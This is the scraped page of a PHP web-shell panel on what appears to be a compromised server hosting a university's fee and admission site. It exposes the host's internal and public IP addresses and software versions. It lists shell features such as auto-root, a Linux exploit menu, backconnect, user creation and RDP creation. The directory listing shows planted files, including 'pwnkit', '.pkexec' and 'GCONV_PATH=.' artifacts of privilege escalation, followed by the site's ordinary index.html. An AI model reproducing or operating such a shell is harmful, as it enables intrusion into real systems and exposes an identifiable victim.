Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.17.145.236
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vskub /
adm_stop /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Paytm
[ DIR ]
drwxrwxr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxrwxr-x
.adm_stop.php
3.61
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
MainPage.html
15.85
KB
-rw-rw-r--
PGReprint.html
7.29
KB
-rw-rw-r--
Registrationpage.html
5.54
KB
-rwxr-xr-x
Reprint.html
7.28
KB
-rw-rw-r--
app.php
416
B
-rwxr-xr-x
appPrint.php
10.35
KB
-rw-rw-r--
barcode_test.php
1.8
KB
-rwxr-xr-x
cconfig.php
1.49
KB
-rwxr-xr-x
elgindex.html
6.35
KB
-rw-rw-r--
getdata.php
3.25
KB
-rwxr-xr-x
index.html
5.6
KB
-rwxr-xr-x
index_old.html
4.82
KB
-rwxr-xr-x
pgResponse.php
5.14
KB
-rw-rw-r--
pgindex.html
6.42
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
regadm.html
21.04
KB
-rw-rw-r--
resume_det.php
2.59
KB
-rwxr-xr-x
resume_det_old.php
2.95
KB
-rwxr-xr-x
resume_det_old1.php
1.73
KB
-rwxr-xr-x
testindex.html
5.6
KB
-rw-rw-r--
update.php
740
B
-rwxr-xr-x
upload_file.php
763
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport" /> <title>Registration Fees </title> <!-- Favicon--> <link rel="icon" href="images/favicon.jpg" type="image/x-icon" /> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Roboto:400,700&subset=latin,cyrillic-ext" rel="stylesheet" type="text/css" /> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css" /> <link href="plugins/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css" /> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap.css" rel="stylesheet" /> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <!-- Animation Css --> <link href="plugins/animate-css/animate.css" rel="stylesheet" /> <!-- Wait Me Css --> <link href="plugins/waitme/waitMe.css" rel="stylesheet" /> <link href="plugins/sweetalert/sweetalert.css" rel="stylesheet" /> <link href="plugins/dropzone/dropzone.css" rel="stylesheet" /> <!-- Custom Css --> <link href="css/style.css" rel="stylesheet" /> <!-- AdminBSB Themes. You can choose a theme from css/themes instead of get all themes --> <link href="css/themes/all-themes.css" rel="stylesheet" /> </head> <body class="theme-cyan"> <!-- Page Loader --> <div class="page-loader-wrapper"> <div class="loader"> <div class="preloader"> <div class="spinner-layer pl-red"> <div class="circle-clipper left"> <div class="circle"></div> </div> <div class="circle-clipper right"> <div class="circle"></div> </div> </div> </div> <p>Please wait...</p> </div> </div> <!-- #END# Page Loader --> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid" style="color: #fff"> <div class="col-md-12 m-t--5"> <center> <h2>VIJAYANAGARA SRI KRISHNADEVARAYA UNIVERSITY</h2> </center> </div> </div> </nav> <section class="content"> <div class="row clearfix"> <div class="container-fluid"> <div class="col-lg-10 col-md-10 col-sm-12 col-xs-12"> <div class="card p-l-20 p-r-20 p-b-100"> <div class="header"> <h3>VIJAYANAGARA SRI KRISHNADEVARAYA UNIVERSITY</h3> </div> <table style="float: left"> <br /> <br /> <td style="font-size: 12px"> <a href="elgindex.html" ><button class="btn btn-primary btn-lg waves-effect p-l-30 p-r-30" style="font-size: 16px" > Apply for Eligibility Fee </button></a > </td> </table> <table style="float: right"> <td style="font-size: 12px"> <a href="regadm.html" ><button class="btn btn-primary btn-lg waves-effect p-l-30 p-r-30" style="font-size: 16px" > Apply for PG online Admission </button></a > </td> </table> </div> </div> </div> </div> </section> <script src="js/appForm.js"></script> <script src="js/control.js"></script> <script src="js/validate.js"></script> <script src="js/MainPage.js"></script> <!-- Jquery Core Js --> <script src="plugins/jquery/jquery.min.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Select Plugin Js --> <script src="plugins/bootstrap-select/js/bootstrap-select.js"></script> <!-- Slimscroll Plugin Js --> <script src="plugins/jquery-slimscroll/jquery.slimscroll.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <script src="plugins/jquery-validation/jquery.validate.js"></script> <script src="plugins/jquery-steps/jquery.steps.js"></script> <script src="js/pages/forms/form-wizard.js"></script> <script src="plugins/sweetalert/sweetalert.min.js"></script> <!-- Autosize Plugin Js --> <script src="js/form_submit.js"></script> <!-- Input Mask Plugin Js --> <script src="plugins/jquery-inputmask/jquery.inputmask.bundle.js"></script> <script src="plugins/dropzone/dropzone.js"></script> <script src="plugins/bootstrap-tagsinput/bootstrap-tagsinput.js"></script> <script src="plugins/jquery-validation/jquery.validate.js"></script> <script src="plugins/jquery-steps/jquery.steps.js"></script> <script src="plugins/sweetalert/sweetalert.min.js"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <script src="js/appStatus.js"></script> <!-- Demo Js --> <script src="js/demo.js"></script> <script type="text/javascript"> $(function () { $("li").click(function () { // remove classes from all $("li").removeClass("active"); // add class to the one we clicked $(this).addClass("active"); }); }); </script> </body> </html>
Close